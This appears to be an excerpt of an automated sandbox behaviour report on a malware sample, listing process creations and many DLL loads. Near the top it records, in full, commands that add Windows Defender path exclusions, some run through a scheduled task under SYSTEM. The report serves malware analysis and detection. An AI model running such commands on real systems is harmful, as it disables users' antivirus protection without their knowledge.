Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7992 -ip 7992
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7992 -s 2280
Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: etoken.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: etoken.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
